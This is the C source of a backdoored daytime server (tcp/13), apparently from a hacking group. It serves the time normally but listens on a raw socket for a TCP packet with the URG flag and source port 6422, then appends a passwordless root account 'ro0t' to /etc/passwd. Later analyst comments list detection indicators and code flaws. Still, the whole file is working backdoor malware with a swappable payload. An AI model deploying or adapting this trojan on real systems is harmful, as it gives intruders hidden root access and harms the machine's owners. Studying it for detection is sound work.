/* EXCLUDED-TEAM (www.excluded.org)
   daytimetroj.c

this is a trojaned version of a daytime server (tcp/13).
execute it from inetd - the daytime server can then be used as normal.
connect with telnet to 1.1.1.1 13 and u ll see the date + time.
but what u dont see is that the server listens on a raw tcp sock too.
as coded in check_raw(int *sock), it checks the tcp packets for
specials. here (standard) it looks for tcp +urg packets from the source-
port 6422. if it catches such a packet it ll execute do_evil_things(void).
u can modify this function as u want. by default it creates a
root account.
ro0t::0:0:muahah:/:/bin/bash

to activate the trojan use the program trojactiv!

l0om
*/


#include <stdio.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>



#define TROJPORT   6422    /* TCP source port that check_raw() matches on the raw socket */



/* Reads one packet from the raw socket; returns 1 on a trigger match, -1 otherwise. */
int check_raw(int *sock);
void do_evil_things(void);  /* payload hook; main() calls it when check_raw() returns 1 */


/*
 * Entry point: a daytime responder on tcp/13 that also watches a raw TCP
 * socket for a trigger packet.
 *
 * Both descriptors are multiplexed with select(). A connection on the
 * listening socket is answered with the ctime() string and closed; a packet
 * on the raw socket is handed to check_raw(), and do_evil_things() runs
 * when that call returns 1. argc and argv are not used.
 *
 * Returns -1 if either socket() call fails. The loop has no exit, so the
 * final return is not reached.
 *
 * Analyst notes (detection and triage):
 *  - The raw socket is never bound or put into listen state, so it does not
 *    appear as an extra listening TCP port. The anomaly to look for is a
 *    daytime service that holds an AF_INET/SOCK_RAW descriptor (on Linux,
 *    raw sockets are listed in /proc/net/raw).
 *  - Every reply is written as a fixed 40 bytes from a zeroed buffer, so the
 *    date string is followed by NUL padding on the wire.
 *  - The results of bind(), listen(), select(), accept() and write() are not
 *    checked, and servaddr is not zeroed before its three fields are set.
 */
int main(int argc, char **argv)
{
  int listenfd, connfd, rawsock;
  struct sockaddr_in servaddr;
  int check = 0;
  time_t istime;
  char buffer[40];
  fd_set rset;


  /* Raw socket for IPPROTO_TCP: this is the trigger channel. */
  rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  if(rawsock < 0) {
    fprintf(stderr, "cannot set up socket\n");
    return (-1);
  }

  /* Ordinary stream socket for the visible daytime service. */
  listenfd = socket(AF_INET, SOCK_STREAM, 0);
  if(listenfd < 0) {
    fprintf(stderr, "cannot set up socket\n");
    return (-1);
  }

  /* Port 13 on all local addresses. */
  servaddr.sin_family = AF_INET;
  servaddr.sin_port = htons(13);
  servaddr.sin_addr.s_addr = htonl(INADDR_ANY);

  /* NOTE(review): the cast names `struct servaddr`, which this file never declares. */
  bind(listenfd, (struct servaddr *)&servaddr, sizeof(servaddr));

  listen(listenfd, 2);

  while(1>0) {

    /* select() modifies the set, so it is rebuilt on every pass. */
    FD_ZERO(&rset);
    FD_SET(rawsock, &rset);
    FD_SET(listenfd, &rset);

    memset(buffer, '\0', 40);

    /* nfds is the sum of both descriptors plus one, not the highest plus one. */
    select(rawsock+listenfd+1, &rset, NULL, NULL, NULL);   /* NULL timeout: block until a descriptor is readable */

    if(FD_ISSET(listenfd, &rset)) {
      connfd = accept(listenfd, (struct sockaddr *)NULL, NULL);

      /* Cover behaviour: send the current time, then close the connection. */
      istime = time(NULL);
      snprintf(buffer, 40, "%s\r\n",ctime(&istime));
      /* All 40 bytes are sent, including the zero bytes after the string. */
      write(connfd, buffer, 40);

      close(connfd);
    }

    if(FD_ISSET(rawsock, &rset)) {
      /* check keeps the last check_raw() result; it is not read anywhere else. */
      if( (check = check_raw(&rawsock)) == 1)
	do_evil_things();
      else continue;
    }
  }


  return (0);
}



/*
 * Read one packet from the raw socket and test it against the trigger.
 *
 * sock: pointer to the raw socket descriptor opened in main().
 * Returns 1 when the packet has the TCP URG flag set and its source port
 * equals TROJPORT; returns -1 for any other packet or when read() fails.
 *
 * Analyst notes:
 *  - Only those two header fields are compared. No destination port, payload
 *    or shared secret is examined here, so the trigger is unauthenticated.
 *  - The TCP header is taken at a fixed sizeof(struct iphdr) offset, and the
 *    byte count returned by read() is not compared with the header sizes.
 *    After a short read the tested fields come from uninitialised stack bytes.
 *  - Network indicator: inbound TCP segments with URG set and source port
 *    6422 (TROJPORT).
 */
int check_raw(int *sock)
{
  char buffer[1024];
  struct iphdr *ip;
  struct tcphdr *tcp;


  /* ip is assigned but never read in this function. */
  ip = (struct iphdr *)buffer;
  tcp = (struct tcphdr *) (buffer + sizeof(struct iphdr));

  /* Any result other than -1 counts as success, including a 0-byte read. */
  if(read(*sock, buffer, sizeof(buffer)) != -1)
    if(tcp->urg == 1 && ntohs(tcp->source) == TROJPORT)
      return 1;
    else return -1;
  else return -1;
}


/*
 * Payload hook that main() calls when check_raw() reports a trigger.
 *
 * As written it passes one command to system(), which appends a line to
 * /etc/passwd through shell redirection: user "ro0t", empty password
 * field, UID 0, GID 0, home "/", shell /bin/bash. The append runs on every
 * trigger, so repeated triggers leave duplicate lines. The return value of
 * system() is ignored.
 *
 * Indicators and checks:
 *  - the line `ro0t::0:0:muhaha:/:/bin/bash` in /etc/passwd (the file header
 *    spells the comment field "muahah"; the string below is what is written);
 *  - any UID 0 entry other than root, or any entry with an empty password
 *    field;
 *  - a daytime/inetd child process that spawns a shell or /bin/echo.
 * File-integrity monitoring on /etc/passwd covers the default payload. The
 * author states that the body is meant to be replaced, so other builds may
 * behave differently.
 */
void do_evil_things(void)
{
  /* Author's placeholder: the payload body is meant to be swapped out. */

  system("/bin/echo  ro0t::0:0:muhaha:/:/bin/bash >>/etc/passwd");

}





